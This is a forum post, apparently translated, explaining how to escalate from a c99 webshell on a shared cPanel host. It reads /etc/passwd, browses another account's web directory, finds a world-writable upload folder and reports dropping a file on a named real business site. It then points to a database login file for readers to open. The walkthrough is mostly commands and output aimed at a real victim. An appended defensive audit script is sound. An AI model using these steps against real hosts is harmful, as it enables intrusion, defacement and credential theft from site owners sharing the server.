abit doang wrote:
What about a shell like mine..??
Looks like it's completely stuck ...
Permission 755, and there are no important files either,..
I can't upload anything either,..
Or can it still be pushed further.???
It's still very doable, bro:
What we have to work with right now:
Webshell: c99
Web directory path: /home/<user>/public_html
From these two assets we can look for writable locations as well as database login information. Here are the steps I can take:
1. View the contents of /etc/passwd
Type this in the Command Execution section:
cat /etc/passwd
Next, the list of users on the system will be displayed.
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
loansnow:x:512:512::/home/loansnow:/bin/bash
jk:x:32007:32009::/home/jk:/bin/bash
murrland:x:513:513::/home/murrland:/bin/bash
murrclas:x:514:514::/home/murrclas:/bin/bash
wwwinre:x:515:515::/home/wwwinre:/bin/bash
wwwcoor:x:516:516::/home/wwwcoor:/bin/bash
magpie:x:517:517::/home/magpie:/bin/bash
wwwbbc:x:518:518::/home/wwwbbc:/bin/bash
wwwtaa:x:519:519::/home/wwwtaa:/bin/bash
wwwremfi:x:520:520::/home/wwwremfi:/bin/bash
murrcom:x:521:521::/home/murrcom:/bin/bash
wwwclic:x:522:522::/home/wwwclic:/bin/bash
wwwsesa:x:523:523::/home/wwwsesa:/bin/bash
wwwscsa:x:524:524::/home/wwwscsa:/bin/bash
wwwbb:x:525:525::/home/wwwbb:/bin/bash
wwwbv:x:526:526::/home/wwwbv:/bin/bash
westate:x:528:528::/home/westate:/usr/local/cpanel/bin/jailshell
djautos:x:529:529::/home/djautos:/usr/local/cpanel/bin/jailshell
raptchau:x:530:530::/home/raptchau:/bin/bash
wwwweb:x:531:531::/home/wwwweb:/bin/bash
supasorb:x:532:532::/home/supasorb:/bin/bash
yoshiki:x:533:533::/home/yoshiki:/bin/bash
bcampers:x:534:534::/home/bcampers:/bin/bash
wwwposi:x:535:535::/home/wwwposi:/usr/local/cpanel/bin/noshell
wwwbsre:x:536:536::/home/wwwbsre:/usr/local/cpanel/bin/noshell
wwwmjf:x:537:537::/home/wwwmjf:/bin/bash
wwwblue:x:538:538::/home/wwwblue:/usr/local/cpanel/bin/noshell
wwwace4:x:539:539::/home/wwwace4:/usr/local/cpanel/bin/noshell
wwwaloa:x:540:540::/home/wwwaloa:/usr/local/cpanel/bin/noshell
wwwmorg:x:541:541::/home/wwwmorg:/usr/local/cpanel/bin/noshell
wwwfair:x:542:542::/home/wwwfair:/usr/local/cpanel/bin/noshell
themurrl:x:543:543::/home/themurrl:/bin/bash
wwwrich:x:544:544::/home/wwwrich:/bin/bash
raok:x:545:545::/home/raok:/usr/local/cpanel/bin/noshell
wwwstyl:x:546:546::/home/wwwstyl:/usr/local/cpanel/bin/noshell
wwwsama:x:547:547::/home/wwwsama:/usr/local/cpanel/bin/noshell
wwwwater:x:548:548::/home/wwwwater:/bin/bash
wwwmill:x:549:549::/home/wwwmill:/bin/bash
wwwbcam:x:550:550::/home/wwwbcam:/bin/bash
hillssa:x:551:551::/home/hillssa:/bin/bash
wwwaldi:x:552:552::/home/wwwaldi:/bin/bash
propoly:x:553:553::/home/propoly:/bin/bash
mwl33577:x:554:554::/home/mwl33577:/usr/local/cpanel/bin/jailshell
wwwcindy:x:555:555::/home/wwwcindy:/bin/bash
wwwharr:x:556:556::/home/wwwharr:/bin/bash
wwwsaski:x:557:557::/home/wwwsaski:/bin/bash
hartmann:x:558:558::/home/hartmann:/bin/bash
miniminy:x:559:559::/home/miniminy:/bin/bash
wwwurban:x:560:560::/home/wwwurban:/bin/bash
ehmpcg:x:561:561::/home/ehmpcg:/bin/bash
wwwincon:x:562:562::/home/wwwincon:/bin/bash
wwwgecr:x:563:563::/home/wwwgecr:/bin/bash
wwwholb:x:564:564::/home/wwwholb:/bin/bash
murray:x:565:565::/home/murray:/usr/local/cpanel/bin/jailshell
masonsre:x:566:566::/home/masonsre:/usr/local/cpanel/bin/jailshell
wwwdogs:x:567:567::/home/wwwdogs:/bin/bash
mbbook:x:568:568::/home/mbbook:/bin/bash
blondies:x:569:569::/home/blondies:/bin/bash
wwwmach:x:570:570::/home/wwwmach:/bin/bash
polarpri:x:571:571::/home/polarpri:/usr/local/cpanel/bin/noshell
polardis:x:573:573::/home/polardis:/bin/bash
mclascom:x:503:500::/home/mclascom:/bin/bash
polar2:x:504:501::/home/polar2:/bin/bash
wwwcool:x:505:502::/home/wwwcool:/bin/bash
murraybr:x:506:503::/home/murraybr:/bin/bash
mbmotel:x:507:504::/home/mbmotel:/bin/bash
wwwridl:x:508:505::/home/wwwridl:/bin/bash
spirit09:x:509:506::/home/spirit09:/bin/bash
mbunited:x:574:507::/home/mbunited:/bin/bash
aungerre:x:575:508::/home/aungerre:/bin/bash
bexhaust:x:576:509::/home/bexhaust:/bin/bash
taylored:x:577:574::/home/taylored:/bin/bash
wwwzen:x:578:575::/home/wwwzen:/bin/bash
mbmerc:x:579:576::/home/mbmerc:/bin/bash
wwwroof:x:580:577::/home/wwwroof:/bin/bash
wwwopen:x:581:578::/home/wwwopen:/bin/bash
leadinge:x:582:579::/home/leadinge:/bin/bash
wwwpure:x:583:580::/home/wwwpure:/bin/bash
wwwspend:x:584:581::/home/wwwspend:/bin/bash
mbplay:x:585:582::/home/mbplay:/bin/bash
wwwlej:x:586:583::/home/wwwlej:/bin/bash
wwwtoto:x:587:584::/home/wwwtoto:/bin/bash
wwwmbweb:x:588:585::/home/wwwmbweb:/bin/bash
wwwdab:x:589:586::/home/wwwdab:/bin/bash
polar3:x:590:587::/home/polar3:/bin/bash
wwwprint:x:591:588::/home/wwwprint:/bin/bash
wwwmbmc:x:592:589::/home/wwwmbmc:/bin/bash
mbinvest:x:593:590::/home/mbinvest:/bin/bash
My target this time is the user named hartmann
2. From the user info we have obtained, we can try entering each user's web directory.
ls -l /home/hartmann/public_html
Result:
Code:
total 2072
-rw-r--r-- 1 hartmann hartmann 8327 Nov 21 2009 AC_RunActiveContent.js
drwxr-xr-x 2 hartmann hartmann 4096 Sep 25 2009 admin
drwxr-xr-x 2 hartmann hartmann 4096 Sep 10 2009 cgi-bin
-rw-r--r-- 1 hartmann hartmann 12763 Nov 23 2009 contactus.htm
drwxr-xr-x 3 hartmann hartmann 4096 Sep 24 2009 css
-rw-r--r-- 1 hartmann hartmann 7760 Sep 24 2009 gallery.htm
drwxrwxrwx 2 hartmann hartmann 4096 Mar 7 18:06 galleryimages
-rw-r--r-- 1 hartmann hartmann 9319 Nov 21 2009 gallery.php
-rw-r--r-- 1 hartmann hartmann 43815 Nov 21 2009 hartwhite.swf
-rw-r--r-- 1 hartmann hartmann 24155 Nov 23 2009 home.htm
drwxr-xr-x 3 hartmann hartmann 4096 Nov 21 2009 images
drwxr-xr-x 2 hartmann hartmann 4096 Sep 24 2009 include
-rw-r--r-- 1 hartmann hartmann 4470 Oct 27 2009 meetthestaff.htm
drwxr-xr-x 4 hartmann hartmann 4096 Sep 15 2009 _mm
drwxr-xr-x 2 hartmann hartmann 4096 Nov 23 2009 _notes
-rw-r--r-- 1 hartmann hartmann 132 Sep 15 2009 robots.txt
-rw-r--r-- 1 hartmann hartmann 6629 Nov 23 2009 services.htm
-rw-r--r-- 1 hartmann hartmann 8949 Nov 21 2009 Southcoast.htm
-rw-r--r-- 1 hartmann hartmann 1931680 Oct 23 2009 swflash.cab
3. Finding a writable location:
From the list of files and directories shown above, there is 1 location we can write to, namely:
drwxrwxrwx 2 hartmann hartmann 4096 Mar 7 18:06 galleryimages
We can go straight to that location, then upload or create a file of our own.
Result:
http://hartmannplumbing.com.au/galleryi ... 3m3b0y.txt
4. Another thing we can do is look for database connection info.
My eye was drawn to the directory:
drwxr-xr-x 2 hartmann hartmann 4096 Sep 24 2009 include
I then went into that location and found some interesting files:
Code:
total 172
-rw-r--r-- 1 hartmann hartmann 1870 Sep 24 2009 dbfunctions.inc
-rw-r--r-- 1 hartmann hartmann 4968 Sep 24 2009 functions.inc
-rw-r--r-- 1 hartmann hartmann 4014 Sep 15 2009 gallery.css
-rw-r--r-- 1 hartmann hartmann 11630 Sep 15 2009 gallery.js
-rw-r--r-- 1 hartmann hartmann 120620 Sep 15 2009 jquery.js
-rw-r--r-- 1 hartmann hartmann 106 Sep 24 2009 logins.inc
-rw-r--r-- 1 hartmann hartmann 4021 Sep 15 2009 thickbox.css
-rw-r--r-- 1 hartmann hartmann 11629 Sep 15 2009 thickbox.js
Next I tried opening the contents of the file logins.inc
Result:
Just check it yourself...
Ok, that's all folks
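
A defensive counterpart to the steps above, added here as an example and not part of the original post: a shell function a hosting administrator can run to find the three permission exposures the walkthrough depends on (web roots other accounts can list, world-writable directories, world-readable include files). The /home/<user>/public_html layout comes from the post; the function name, report labels and file-name patterns are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): permission audit for shared hosting.
# Assumed layout, taken from the post: <base>/<user>/public_html
# Usage, as root so every account's tree is visible: audit_webroots /home

audit_webroots() {
    base=${1:-/home}
    for root in "$base"/*/public_html; do
        [ -d "$root" ] || continue

        # Web root that any other local account can list (o+r on the directory).
        find "$root" -prune -perm -0004 -print 2>/dev/null |
            sed 's/^/WORLD-LISTABLE-WEBROOT /'

        # Directories any local account can write into, such as an upload
        # folder left at drwxrwxrwx.
        find "$root" -type d -perm -0002 -print 2>/dev/null |
            sed 's/^/WORLD-WRITABLE-DIR /'

        # Include/config files any local account can read. These often hold
        # database credentials. The name patterns are assumptions; extend them.
        find "$root" -type f -perm -0004 \
            \( -name '*.inc' -o -name 'config*.php' -o -name '.env' \) \
            -print 2>/dev/null |
            sed 's/^/WORLD-READABLE-CONFIG /'
    done
}
```

Each finding maps to a chmod fix: remove the "other" permission bits (for example 750 on directories and 640 or 600 on credential files) and let the web server reach the files through group ownership or per-user PHP execution.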